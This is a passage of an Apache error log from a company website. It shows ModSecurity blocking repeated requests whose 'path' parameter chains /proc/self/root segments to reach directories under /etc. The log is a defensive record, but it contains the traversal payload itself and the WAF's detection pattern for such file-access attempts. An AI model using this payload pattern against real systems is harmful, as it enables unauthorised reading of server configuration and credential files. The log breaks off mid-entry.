[Tue Mar 17 16:23:22.893816 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:52080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqKhj0p0SRWAqcjGGH7wAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:24.223456 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:52090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqLNa6ubjKNq_cu4YWqgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:25.548655 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:52094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqLQeiSKl8TjouI-YmOgAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:27.129822 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:23:27.650965 2026] [:error] [pid 29151:tid 140411599251200] [client 74.7.241.31:41204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqL_PqhzTj3BvfDX-V3QAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:29.113575 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:41208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqMdY0UrI5A3LftIwLewAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:31.611082 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:41224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqMweiSKl8TjouI-YmPQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:33.067899 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:41234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqNdY0UrI5A3LftIwLfgAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:36.738279 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:41248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqONY0UrI5A3LftIwLhAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:39.429111 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.31:34856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqO6BJNF7axNlVR0Um9wAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:40.948022 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:34858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqPBj0p0SRWAqcjGGH8gAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:46.151751 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.241.31:34866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqQq4xEDsg_V3ESNZZqQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:46.894131 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.128:59250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqQqBJNF7axNlVR0Um-wAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:23:48.057907 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:23:49.419112 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:43374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqRXIk7brgkOH-rIWaKQAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:51.965205 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:43382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqR64xEDsg_V3ESNZZqgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:53.497364 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:43386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqScU6Sx0TG1YjmQi83wAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:56.240444 2026] [:error] [pid 6296:tid 140411616036608] [client 74.7.241.31:43392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqTHIk7brgkOH-rIWaKgAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:58.757462 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:36192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqTq4xEDsg_V3ESNZZrAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:00.240195 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:36198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqUBj0p0SRWAqcjGGH-gAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:02.967537 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.244.43:56608] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmqUhj0p0SRWAqcjGGH_wAAAwg"]
[Tue Mar 17 16:24:03.519400 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:36210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqUweiSKl8TjouI-YmRgAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:07.613636 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.243.128:60808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqVxj0p0SRWAqcjGGIAgAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:24:10.133834 2026] [proxy_fcgi:error] [pid 7437:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:32974] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:24:11.235393 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:36224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] 